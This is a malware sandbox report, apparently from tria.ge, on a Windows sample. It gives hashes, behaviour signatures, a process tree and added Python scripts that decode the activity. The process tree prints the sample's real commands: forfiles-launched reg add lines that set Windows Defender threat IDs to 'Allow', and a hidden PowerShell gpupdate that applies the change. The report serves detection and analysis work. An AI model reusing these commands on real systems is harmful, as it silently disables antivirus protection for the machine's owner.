Analysis
  max time kernel:  68s
  max time network: 17s
  platform:         windows7_x64
  resource:         win7-20240903-en
  resource tags:    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  submitted:        21/09/2024, 15:21
Static task: static1

Behavioral task: behavioral1
  Sample:   fe102286866ca9377249551ec2794b4564fb00f5cf21b4c9992040b3b13b2c77N.exe
  Resource: win7-20240903-en

Behavioral task: behavioral2
  Sample:   fe102286866ca9377249551ec2794b4564fb00f5cf21b4c9992040b3b13b2c77N.exe
  Resource: win10v2004-20240802-en
General
  Target: fe102286866ca9377249551ec2794b4564fb00f5cf21b4c9992040b3b13b2c77N.exe
  Size:   6.7MB
  MD5:    608fe9a6d6ef81a885f55a989f45b710
  SHA1:   e9e60dd64b66f324ce953554179f3d3c5544f0ca
  SHA256: fe102286866ca9377249551ec2794b4564fb00f5cf21b4c9992040b3b13b2c77
  SHA512: 670067a4211326eaa995d3f3817ec4dbf0075b042882d46de1aa9ec98794fa1acf722c2cf81111df1fb41afca292c70a6324be389f17f304bfe85a94a3177393
  SSDEEP: 196608:HC7vgxkdo2BI5dUCz8PtxCvFSRPwdUCFqP6tc:H+vbdo+I4KsSCYtkiC
Malware Config
Signatures
Command and Scripting Interpreter: PowerShell (1 TTP, 1 IoC)
Runs PowerShell and hides the display window.
  pid   process
  2588  powershell.exe

Indirect Command Execution (1 TTP, 5 IoCs)
Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.
  pid   process
  2684  forfiles.exe
  2688  forfiles.exe
  2672  forfiles.exe
  2808  forfiles.exe
  2812  forfiles.exe

Drops file in System32 directory (1 IoC)
  File opened for modification: \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
  process: powershell.exe
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Program crash (1 IoC)
  pid   pid_target  process       procid_target
  2944  2844        WerFault.exe  29
System Location Discovery: System Language Discovery (1 TTP, 18 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
  by process (count): cmd.exe (6), forfiles.exe (5), reg.exe (4), powershell.exe (1), gpupdate.exe (1), fe102286866ca9377249551ec2794b4564fb00f5cf21b4c9992040b3b13b2c77N.exe (1)
  Every process in the tree, including gpupdate.exe and the sample itself, triggers this; on its own it is low-signal.
Suspicious behavior: EnumeratesProcesses (3 IoCs)
  pid   process
  2588  powershell.exe (3 entries)

Suspicious use of AdjustPrivilegeToken (1 IoC)
  Token: SeDebugPrivilege   pid 2588   powershell.exe

Suspicious use of WriteProcessMemory (64 IoCs)
Each parent/child pair below is recorded four times in the report (16 unique pairs, 64 entries).
  pid   wrote to memory of  process                                                                 procid_target
  2844  2168                fe102286866ca9377249551ec2794b4564fb00f5cf21b4c9992040b3b13b2c77N.exe  30
  2168  2808                cmd.exe                                                                 32
  2808  2796                forfiles.exe                                                            33
  2796  2788                cmd.exe                                                                 34
  2168  2812                cmd.exe                                                                 35
  2812  2996                forfiles.exe                                                            36
  2996  2708                cmd.exe                                                                 37
  2168  2684                cmd.exe                                                                 38
  2684  2984                forfiles.exe                                                            39
  2984  2780                cmd.exe                                                                 40
  2168  2688                cmd.exe                                                                 41
  2688  2560                forfiles.exe                                                            42
  2560  852                 cmd.exe                                                                 43
  2168  2672                cmd.exe                                                                 44
  2672  2776                forfiles.exe                                                            45
  2776  2588                cmd.exe                                                                 46
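The WriteProcessMemory entries above are the raw parent/child record Triage uses to draw the process tree, with every pair repeated. The Python below is an added illustration for this report, not tria.ge code and not part of the sample: it rebuilds the lineage from a constructed subset of those lines, fills in the leaf images (reg.exe, powershell.exe) from the Processes section, and flags every chain in which an indirect launcher hands off to cmd.exe, which is the pattern the Indirect Command Execution signature fired on. forfiles.exe is the launcher seen on this page; pcalua.exe in the launcher set is an added assumption taken from MITRE T1202.

```python
"""Rebuild process lineage from Triage 'Suspicious use of WriteProcessMemory' IoCs.

Added example for this report (not tria.ge code, not part of the sample).
Triage lists each parent->child pair several times; this collapses them,
reconstructs the tree and flags the forfiles -> cmd.exe launcher pattern
behind the 'Indirect Command Execution' signature.
"""
import re
from collections import defaultdict

# Constructed subset of the report's IoC lines. Format:
# "PID <parent> wrote to memory of <child> <parent> <parent image> <triage proc id>"
WPM_LINES = """
PID 2844 wrote to memory of 2168 2844 fe102286866ca9377249551ec2794b4564fb00f5cf21b4c9992040b3b13b2c77N.exe 30
PID 2844 wrote to memory of 2168 2844 fe102286866ca9377249551ec2794b4564fb00f5cf21b4c9992040b3b13b2c77N.exe 30
PID 2168 wrote to memory of 2808 2168 cmd.exe 32
PID 2808 wrote to memory of 2796 2808 forfiles.exe 33
PID 2796 wrote to memory of 2788 2796 cmd.exe 34
PID 2168 wrote to memory of 2672 2168 cmd.exe 44
PID 2672 wrote to memory of 2776 2672 forfiles.exe 45
PID 2776 wrote to memory of 2588 2776 cmd.exe 46
"""

# Leaves never appear as writers, so their image names are not in the IoC
# list; taken from the Processes section (constructed lookup for this example).
LEAF_IMAGES = {2788: "reg.exe", 2588: "powershell.exe"}

# Indirect launchers: forfiles.exe is on this page, pcalua.exe is an
# assumption added from MITRE T1202. Extend as needed.
INDIRECT_LAUNCHERS = {"forfiles.exe", "pcalua.exe"}

WPM_RE = re.compile(r"PID (\d+) wrote to memory of (\d+) \1 (\S+) \d+")


def parse_wpm(text):
    """Return (children, images): parent pid -> unique child pids in order, pid -> image."""
    children = defaultdict(list)
    images = dict(LEAF_IMAGES)
    for m in WPM_RE.finditer(text):
        parent, child, image = int(m.group(1)), int(m.group(2)), m.group(3)
        images[parent] = image
        if child not in children[parent]:      # collapse the repeated entries
            children[parent].append(child)
    return children, images


def roots(children):
    """Pids that write to others but are never written to."""
    all_children = {c for cs in children.values() for c in cs}
    return [p for p in children if p not in all_children]


def chains(children, images, root):
    """All root-to-leaf paths as [(pid, image), ...], depth-first."""
    out = []

    def walk(pid, path):
        path = path + [(pid, images.get(pid, "?"))]
        kids = children.get(pid, [])
        if not kids:
            out.append(path)
        for kid in kids:
            walk(kid, path)

    walk(root, [])
    return out


def is_indirect_execution(chain):
    """True if an indirect launcher spawns cmd.exe anywhere in the chain."""
    names = [img.lower() for _, img in chain]
    return any(names[i] in INDIRECT_LAUNCHERS and names[i + 1] == "cmd.exe"
               for i in range(len(names) - 1))


def indirect_chains(text):
    """Render every flagged chain as 'image(pid) -> image(pid) -> ...'."""
    children, images = parse_wpm(text)
    flagged = []
    for root in roots(children):
        flagged += [c for c in chains(children, images, root) if is_indirect_execution(c)]
    return [" -> ".join(f"{img}({pid})" for pid, img in c) for c in flagged]


if __name__ == "__main__":
    for line in indirect_chains(WPM_LINES):
        print(line)
```

On the constructed subset this yields two chains, sample -> cmd.exe -> forfiles.exe -> cmd.exe -> reg.exe and sample -> cmd.exe -> forfiles.exe -> cmd.exe -> powershell.exe; feeding the full 64-entry list gives all five forfiles branches. The same lineage check maps directly onto Sysmon event 1 or Security 4688 records, where ParentImage and Image replace the pid pairs.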
Processes

C:\Users\Admin\AppData\Local\Temp\fe102286866ca9377249551ec2794b4564fb00f5cf21b4c9992040b3b13b2c77N.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\fe102286866ca9377249551ec2794b4564fb00f5cf21b4c9992040b3b13b2c77N.exe"
  PID: 2844
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\cmd.exe
    command line: "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    PID: 2168
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\forfiles.exe
      command line: forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
      PID: 2808
      - Indirect Command Execution
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory

      C:\Windows\SysWOW64\cmd.exe
        command line: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        PID: 2796
        - System Location Discovery: System Language Discovery
        - Suspicious use of WriteProcessMemory

        \??\c:\windows\SysWOW64\reg.exe
          command line: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
          PID: 2788
          - System Location Discovery: System Language Discovery

    C:\Windows\SysWOW64\forfiles.exe
      command line: forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
      PID: 2812
      - Indirect Command Execution
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory

      C:\Windows\SysWOW64\cmd.exe
        command line: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        PID: 2996
        - System Location Discovery: System Language Discovery
        - Suspicious use of WriteProcessMemory

        \??\c:\windows\SysWOW64\reg.exe
          command line: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
          PID: 2708
          - System Location Discovery: System Language Discovery

    C:\Windows\SysWOW64\forfiles.exe
      command line: forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
      PID: 2684
      - Indirect Command Execution
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory

      C:\Windows\SysWOW64\cmd.exe
        command line: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        PID: 2984
        - System Location Discovery: System Language Discovery
        - Suspicious use of WriteProcessMemory

        \??\c:\windows\SysWOW64\reg.exe
          command line: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
          PID: 2780
          - System Location Discovery: System Language Discovery

    C:\Windows\SysWOW64\forfiles.exe
      command line: forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
      PID: 2688
      - Indirect Command Execution
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory

      C:\Windows\SysWOW64\cmd.exe
        command line: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        PID: 2560
        - System Location Discovery: System Language Discovery
        - Suspicious use of WriteProcessMemory

        \??\c:\windows\SysWOW64\reg.exe
          command line: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
          PID: 852
          - System Location Discovery: System Language Discovery

    C:\Windows\SysWOW64\forfiles.exe
      command line: forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
      PID: 2672
      - Indirect Command Execution
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory

      C:\Windows\SysWOW64\cmd.exe
        command line: /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        PID: 2776
        - System Location Discovery: System Language Discovery
        - Suspicious use of WriteProcessMemory

        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          command line: powershell start-process -WindowStyle Hidden gpupdate.exe /force
          PID: 2588
          - Command and Scripting Interpreter: PowerShell
          - Drops file in System32 directory
          - System Location Discovery: System Language Discovery
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken

          C:\Windows\SysWOW64\gpupdate.exe
            command line: "C:\Windows\system32\gpupdate.exe" /force
            PID: 1396
            - System Location Discovery: System Language Discovery

  C:\Windows\SysWOW64\WerFault.exe
    command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 240
    PID: 2944
    - Program crash
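What the depth-2 cmd.exe command line actually does is hidden behind three layers of quoting. Each forfiles call uses /m to name a file that is expected to exist in the target directory (where.exe, calc.exe, waitfor.exe, help.exe), so the /c payload runs once per call with forfiles as the launching process rather than the sample; the nested cmd /C turns the \" escapes back into plain quotes before reg.exe sees them. Four of the five payloads write REG_SZ value 6 under HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction, which is the Defender policy for the default action per threat ID, and 6 is the documented code for Allow (MITRE T1562.001, Impair Defenses). The fifth runs gpupdate /force from a hidden PowerShell window so the policy is applied without waiting for the next refresh. The page does not say which detections the four threat IDs correspond to, so nothing here names them. The Python below is an added illustration for this report, not tria.ge code and not part of the sample; it takes the command line verbatim from the tree above and decodes it. The action-code table is Microsoft's documented ThreatIDDefaultAction mapping (the same codes Set-MpPreference -ThreatIDDefaultAction_Actions uses); the parsing helpers and their names are this example's own.

```python
"""Decode the forfiles -> cmd -> reg chain in the cmd.exe (PID 2168) command line.

Added example for this report; not tria.ge code and not part of the sample.
CMDLINE is copied from the process tree above; DEFENDER_ACTIONS is Microsoft's
documented ThreatIDDefaultAction value mapping. Everything else is this
example's own illustrative code.
"""
import re

# Verbatim command line of cmd.exe (PID 2168) from the report.
CMDLINE = (
    r'"C:\Windows\System32\cmd.exe" /C '
    r'forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & '
    r'forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & '
    r'forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & '
    r'forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & '
    r'forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"'
)

THREAT_POLICY_KEY = r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction"

# Documented ThreatIDDefaultAction values (Set-MpPreference -ThreatIDDefaultAction_Actions).
DEFENDER_ACTIONS = {"1": "Clean", "2": "Quarantine", "3": "Remove", "6": "Allow",
                    "8": "UserDefined", "9": "NoAction", "10": "Block"}

FORFILES_RE = re.compile(r'forfiles\s+/p\s+(?P<path>\S+)\s+/m\s+(?P<mask>\S+)\s+/c\s+"(?P<cmd>.*)"\s*$', re.I)
REG_ADD_RE = re.compile(r'reg\s+add\s+"(?P<key>[^"]+)"(?P<args>.*)$', re.I)


def split_segments(cmdline):
    """Strip the outer '"...cmd.exe" /C' wrapper and split on cmd.exe's '&' separator."""
    body = re.sub(r'^"[^"]*cmd\.exe"\s+/C\s+', "", cmdline, flags=re.I)
    return [s.strip() for s in body.split(" & ")]


def unwrap_forfiles(segment):
    """Return the command forfiles would run for each /m match, or None if not forfiles."""
    m = FORFILES_RE.match(segment)
    if not m:
        return None
    inner = m.group("cmd").replace(r'\"', '"')              # \" escapes become plain quotes
    inner = re.sub(r"^cmd\s+/C\s+", "", inner, flags=re.I)  # drop the inner 'cmd /C' wrapper
    return {"path": m.group("path"), "mask": m.group("mask"), "inner": inner}


def reg_arg(args, switch):
    """Value following a reg.exe switch such as /v, /t or /d."""
    m = re.search(r"/%s\s+(\S+)" % switch, args, re.I)
    return m.group(1) if m else None


def decode_inner(inner):
    """Classify the unwrapped command and, for Defender policy writes, explain it."""
    m = REG_ADD_RE.match(inner)
    if m:
        rec = {"kind": "reg_add", "key": m.group("key"),
               "name": reg_arg(m.group("args"), "v"),
               "type": reg_arg(m.group("args"), "t"),
               "data": reg_arg(m.group("args"), "d")}
        if rec["key"].lower() == THREAT_POLICY_KEY.lower():
            rec["meaning"] = (f"Defender default action for threat ID {rec['name']} "
                              f"set to {DEFENDER_ACTIONS.get(rec['data'], 'unknown')}")
        return rec
    if re.match(r"powershell\b", inner, re.I):
        return {"kind": "powershell", "cmd": inner,
                "hidden": "-windowstyle hidden" in inner.lower(),
                "gpupdate": "gpupdate" in inner.lower()}
    return {"kind": "other", "cmd": inner}


def decode(cmdline):
    """One record per '&'-separated segment, annotated with its forfiles launcher."""
    steps = []
    for seg in split_segments(cmdline):
        f = unwrap_forfiles(seg)
        if f is None:
            steps.append({"kind": "raw", "cmd": seg})
            continue
        rec = decode_inner(f["inner"])
        rec["launcher"] = f"forfiles /p {f['path']} /m {f['mask']}"
        steps.append(rec)
    return steps


def allowed_threat_ids(steps):
    """Threat IDs this command line sets to Allow (6) under the policy key."""
    return [s["name"] for s in steps
            if s["kind"] == "reg_add" and s["data"] == "6"
            and s["key"].lower() == THREAT_POLICY_KEY.lower()]


if __name__ == "__main__":
    steps = decode(CMDLINE)
    for s in steps:
        print(s.get("meaning") or s.get("cmd"), "  via", s.get("launcher"))
    print("Allow-listed threat IDs:", allowed_threat_ids(steps))
```

Two caveats from the tree are worth keeping in mind when reading the output. First, the sample is 32-bit (every child runs from SysWOW64 and /p c:\windows\system32 is redirected there), but HKLM\SOFTWARE\Policies is a shared key that WOW64 does not redirect, so the 32-bit reg.exe write lands in the same policy key the 64-bit Defender service reads. Second, the "Drops file in System32 directory" hit on powershell.exe is the Windows PowerShell.lnk Start Menu shortcut being opened, a side effect of launching powershell.exe, not a payload being written. On a live host the same policy state can be read with reg query on the key above or with Get-MpPreference, whose ThreatIDDefaultAction_Ids and ThreatIDDefaultAction_Actions properties list the configured IDs and their action codes.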